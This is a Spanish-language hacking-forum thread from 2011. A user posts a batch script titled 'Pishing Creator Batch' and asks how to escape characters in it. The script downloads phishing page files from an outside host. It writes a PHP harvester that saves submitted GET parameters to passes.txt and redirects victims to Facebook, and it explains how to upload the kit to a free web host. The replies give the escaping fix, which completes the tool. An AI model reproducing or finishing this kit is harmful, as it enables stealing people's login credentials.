elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [BATCH] Ayuda guardando archivos de texto a php
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [BATCH] Ayuda guardando archivos de texto a php  (Leído 4,088 veces)
Geormarsch

Desconectado Desconectado

Mensajes: 160



Ver Perfil
[BATCH] Ayuda guardando archivos de texto a php
« en: 19 Septiembre 2011, 18:50 pm »

Hola amigos tengo una duda con este batch en la parte donde yo creo "write.php"
por una razon X no puedo descargarlo con wget.
pero es tan corto que lo puedo crear "echo Hola>write.php"
analizen el codigo...
pero mi duda es la siguiente:

Citar
echo <?php>write.php
echo header("Location: http://www.facebook.com/");>>write.php
echo $handle = fopen("passes.txt", "a");>>write.php
echo foreach($_GET as $variable => $value)>>write.php
echo  {>>write.php
echo fwrite($handle, $variable);>>write.php
echo fwrite($handle, "=");>>write.php
echo fwrite($handle, $value);>>write.php
echo fwrite($handle, "\r\n");>>write.php
echo }>>write.php
echo fwrite($handle, "\r\n");>>write.php
echo fclose($handle);>>write.php
echo exit;>>write.php
echo ?>>>write.php

la ultima linea no lo reconose ya que van 3 >>>
y en la primera tampoco por que al comienzo lleva una asi <
como lo aria para yo poder guardarlo en los archivos como write.php
por que el codigo se guarda pero la primera y la ultima linea no
y el codigo es esencial para que funcione.
Ayudenme

PD: SE QUE EL BATCH NO ESTA LISTO TENGO QUE ARREGLARLE VARIAS COSAS MAS

Código
  1. @echo off
  2. Title Pishing Creator Batch
  3. :menu
  4. cls
  5. color 1c
  6. echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
  7. echo º                                             º
  8. echo º # 1 Crear Archivos Para Pishing º
  9. echo º # 2 Instrucciones de como subirlos º
  10. echo º                º
  11. echo º Nota: Recuerda que necesitas º
  12. echo º Internet para realizar el hack  º
  13. echo º                                             º
  14. echo º                                             º
  15. echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
  16. set /p opcion= Escribe La opcion Indicada =
  17. if %opcion%==1 goto crear
  18. if %opcion%==2 goto instrucciones
  19. if %opcion%=="" goto error
  20. :crear
  21. echo se procedera a crear pagina web
  22. set /p pregunta= Desea continuar? : S/N =
  23. if %pregunta%==s goto si
  24. if %pregunta%==n goto no
  25. if %pregunta%=="" goto si
  26. :si
  27. echo Cargando...
  28. ping -n 3 0.0.0.0>nul
  29. echo Espere.
  30. ping -n 2 0.0.0.0>nul
  31. wget http://h1.ripway.com/pishingbatch/index1.html
  32. wget http://h1.ripway.com/pishingbatch/passes.txt
  33. wget  http://h1.ripway.com/pishingbatch/write.php
  34. echo <?php>write.php
  35. echo header("Location: http://www.facebook.com/");>>write.php
  36. echo $handle = fopen("passes.txt", "a");>>write.php
  37. echo foreach($_GET as $variable => $value)>>write.php
  38. echo  {>>write.php
  39. echo fwrite($handle, $variable);>>write.php
  40. echo fwrite($handle, "=");>>write.php
  41. echo fwrite($handle, $value);>>write.php
  42. echo fwrite($handle, "\r\n");>>write.php
  43. echo }>>write.php
  44. echo fwrite($handle, "\r\n");>>write.php
  45. echo fclose($handle);>>write.php
  46. echo exit;>>write.php
  47. echo ?>>>write.php
  48. echo Ahora sera redirigido a instrucciones...
  49. echo Cargando...
  50. ping -n 2 0.0.0.0>nul
  51. goto instrucciones
  52.  
  53. :no
  54. echo por favor escriba bien la pagina web...
  55. goto menu
  56.  
  57. :instrucciones
  58. cls
  59. echo Intrucciones
  60. echo ya que tenemos creados los archivos
  61. echo Nos registramos en la siguiente pagina
  62. start www.ripway.com
  63. echo Luego pinchamos
  64. echo My files
  65. echo y dentro de el buscamos Upload files
  66. echo y subimos los 3 archivos descargados que son
  67. echo Index.php
  68. echo Passes.txt
  69. echo write.php
  70. echo y Pagina web pishing creada
  71. goto menu
  72.  


En línea

"Comentar el código es como limpiar el cuarto de baño; nadie quiere hacerlo, pero el resultado es siempre una experiencia más agradable para uno mismo y sus invitados"
leogtz
. . .. ... ..... ........ ............. .....................
Colaborador
***
Desconectado Desconectado

Mensajes: 3.069


/^$/


Ver Perfil WWW
Re: [BATCH] Ayuda guardando archivos de texto a php
« Respuesta #1 en: 20 Septiembre 2011, 00:58 am »

Prueba con

echo ?^> >> write.php


En línea

Código
  1. (( 1 / 0 )) &> /dev/null || {
  2. echo -e "stderrrrrrrrrrrrrrrrrrr";
  3. }
  4.  
http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com
Poderoscuro1207

Desconectado Desconectado

Mensajes: 13


Ver Perfil
Re: [BATCH] Ayuda guardando archivos de texto a php
« Respuesta #2 en: 20 Septiembre 2011, 16:33 pm »

como lo dijo el antes. intenta con el signo ^. antes de los >

^<?php^>
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Acciones sobre archivos de texto. [Batch] « 1 2 ... 34 35 »
Scripting
leogtz 348 431,385 Último mensaje 4 Abril 2022, 19:39 pm
por **Aincrad**
Modificar archivos de texto [batch] [Perl] « 1 2 »
Scripting
bjeli1980 10 13,163 Último mensaje 17 Mayo 2010, 09:07 am
por bjeli1980
Estado de fabrica guardando archivos
Windows
Bledniss 8 4,425 Último mensaje 27 Marzo 2012, 17:20 pm
por Lerinor
[BATCH] Ayuda con algoritmo, Accion sobre archivo de texto
Scripting
EAMP14 1 3,739 Último mensaje 19 Abril 2012, 13:43 pm
por Eleкtro
Java Archivos texto(Ayuda).
Java
javitus 2 2,591 Último mensaje 4 Marzo 2013, 02:36 am
por javitus
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines